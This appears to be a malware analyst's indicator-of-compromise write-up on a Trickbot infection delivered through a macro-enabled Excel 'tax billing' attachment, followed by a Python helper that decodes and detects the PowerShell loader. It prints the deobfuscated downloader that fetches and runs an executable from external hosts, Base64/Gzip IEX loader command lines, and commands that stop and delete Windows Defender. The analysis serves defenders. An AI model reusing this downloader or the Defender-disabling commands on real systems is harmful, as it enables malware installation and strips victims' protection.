- #IOC #OptiData #VR #Trickbot #X97M #macro #powershell #obfuscated
- https://pastebin.com/70KhU3a4
- previous contact:
- 05/10/18 https://pastebin.com/75KNqwCf
- 02/10/18 https://pastebin.com/fm5Ug69G
- 24/09/18 https://pastebin.com/LjuNyGfn
- FAQ:
- https://myonlinesecurity.co.uk/trickbot-via-fake-deloitte-canada-tax-billing/
- https://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/
- https://radetskiy.wordpress.com/?s=trickbot
- attack_vector
- --------------
- email attach .xls > macro > cmd > powershell > GET 2 URL > $env:temp+'\tmp1806.exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce
- File name Tax_Billing.xls [Composite Document File V2 Document] Type: OLE, AutoExec
- File size 57.5 KB
- SHA-256 1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a
- File name pro.smoc > tmp1806.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 313.64 KB
- activity
- **************
- deobfuscating_macro
- --------------
- cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));
- IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
- '""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
- @>
- powershell "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));
- (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
- @>
- function <#release#> TurnOn([string] $pch1){$tuc1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};(new-object system.net.webclient <#exim#> ).downloadfile($pch1,$env:temp+'\tmp1806.exe');}catch{$tuc1=0;}return $tuc1;}
- $fne1=@('jumpuprecords{.} com/pro.smoc','beersforgears{.} com/pro.smoc');
- foreach ($riw in $fne1){if(TurnOn('https://'+$riw) -eq 1){break;} };<#validate#>start-process ($env:temp+'\tmp1806.exe')
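- Added analyst helper (not part of the original paste): it reproduces the MemoryStream/GzipStream decode step offline, so the next stage can be read without the IEX that would run it, and adds a triage check for the FromBase64String + GzipStream + IEX loader shape. The Base64 blob and the command line below are constructed samples, not the paste's real payload.

```python
import base64
import gzip
import re

# Matches the Base64 argument of [Convert]::FromBase64String(...) in a
# captured command line; the quotes are doubled ('' or "") when the
# command is nested, as in the cmd.exe -> powershell -> out-file chain above.
B64_ARG = re.compile(
    r"FromBase64String\(\s*['\"]+([A-Za-z0-9+/=]+)['\"]+\s*\)",
    re.IGNORECASE,
)

def decode_gzip_b64_stage(cmdline: str) -> str:
    """Return the plaintext of the Base64+Gzip stage embedded in cmdline.
    Same transformation the loader performs, minus the IEX execution."""
    m = B64_ARG.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String(...) argument found")
    raw = base64.b64decode(m.group(1), validate=True)
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("decoded data is not gzip (magic 1f8b missing)")
    return gzip.decompress(raw).decode("utf-8", errors="replace")

def looks_like_gzip_iex_loader(cmdline: str) -> bool:
    """Triage check for the loader shape seen in this chain:
    FromBase64String + GzipStream + Decompress + IEX on one command line."""
    low = cmdline.lower()
    return all(tok in low for tok in
               ("frombase64string", "gzipstream", "decompress", "iex"))

# Constructed sample: a harmless stage-2 string, gzip+base64 encoded the same
# way the macro does, then wrapped in the loader command line shape from the paste.
SAMPLE_STAGE2 = "Write-Output 'stage2 placeholder (constructed sample)'"
_blob = base64.b64encode(gzip.compress(SAMPLE_STAGE2.encode())).decode()
SAMPLE_CMDLINE = (
    "powershell \"$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('"
    + _blob + "'));IEX (New-Object IO.StreamReader(New-Object "
    "IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)"
    ")).ReadToEnd();\""
)

if __name__ == "__main__":
    print(looks_like_gzip_iex_loader(SAMPLE_CMDLINE))  # True
    print(decode_gzip_b64_stage(SAMPLE_CMDLINE))       # the stage-2 text
```

- Feed it the powershell.exe command line from process or Sysmon (event ID 1) logs; a real sample decodes to a second PowerShell stage like the TurnOn downloader above.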
- pl_src: 2
- --------------
- 69.27.37.10 jumpuprecords{.} com 404
- 192.254.185.228 beersforgears{.} com 404
- C2:
- --------------
- 190.186.39.82
- netwrk
- --------------
- ssl
- 69.27.37.10 jumpuprecords{.} com Client Hello
- 192.254.185.228 beersforgears{.} com Client Hello
- http.request.method == POST
- 190.186.39.82 190.186.39.82 POST /ser0205us/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (!)
- 190.186.39.82 190.186.39.82:8082 POST /ser0205us/APM11_W617601.id/90 HTTP/1.1 test (!)
- comp
- --------------
- powershell.exe 1780 TCP 69.27.37.10 443 ESTABLISHED
- powershell.exe 1780 TCP 192.254.185.228 443 SYN_SENT
- svchost.exe 1504 TCP 46.21.249.220 443 ESTABLISHED
- svchost.exe 1504 TCP 2.21.243.40 80 ESTABLISHED
- svchost.exe 1504 TCP 47.52.62.55 443 SYN_SENT
- svchost.exe 1504 TCP 89.46.223.121 447 ESTABLISHED
- svchost.exe 1504 TCP zimbabweemergencyassistance{.} com https ESTABLISHED
- svchost.exe 1504 TCP a2-21-243-40.deploy.static.akamaitechnologies{.} com http ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE /e
- C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath C:\tmp\tmp9388.bat -encoding ascii; cmd /c 'C:\tmp\tmp9388.bat'
- C:\Windows\SysWOW64\cmd.exe /c C:\tmp\tmp9388.bat
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
- @>
- C:\tmp\tmp1806.exe
- C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
- C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- @>
- C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
- C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
- C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- @>
- C:\Windows\system32\svchost.exe
- @>
- C:\Windows\system32\svchost.exe -k netsvcs
- C:\Windows\system32\taskeng.exe {BBC0F265-32F9-4766-909F-D34E8EEF3FFB} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
- C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
- C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
- C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- persist
- --------------
- Task Scheduler
- \CleanMemoryWinTask c:\users\operator\appdata\roaming\cleanmem\tnq1907.exe 06.02.2019 16:55
- drop
- --------------
- C:\Users\operator\AppData\Roaming\cleanmem\grabber_temp.INTEG.RAW
- C:\Users\operator\AppData\Roaming\cleanmem\tmp.edb
- C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
- C:\Users\operator\AppData\Roaming\cleanmem\vlc-qt-interface.ini
- C:\Users\operator\AppData\Roaming\cleanmem\injectDll64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\networkDll64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\psfin64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64_configs
- C:\Users\operator\AppData\Roaming\cleanmem\importDll64
- C:\Users\operator\AppData\Roaming\cleanmem\injectDll64
- C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64
- C:\Users\operator\AppData\Roaming\cleanmem\networkDll64
- C:\Users\operator\AppData\Roaming\cleanmem\psfin64
- C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64
- C:\Users\operator\AppData\Roaming\cleanmem\shareDll64
- C:\Users\operator\AppData\Roaming\cleanmem\systeminfo64
- C:\Users\operator\AppData\Roaming\cleanmem\wormwinDll64
- # # #
- https://www.virustotal.com/#/file/2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce/details
- https://www.virustotal.com/#/url/240554f90c39c2c914803a8ee2c295d5c848482f82138d20a236d6b71b2c823c/details
- https://www.virustotal.com/#/url/0b963e7eb53d1d7cbca89b53b376530a92abb5bf7a5fff97f100a0545545b34d/details
- https://urlhaus.abuse.ch/url/118629/
- https://urlhaus.abuse.ch/url/118628/
- https://www.virustotal.com/#/file/1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a/details
- https://analyze.intezer.com/#/analyses/66286e3c-deca-480c-9f36-caebee871a10
- VR
- @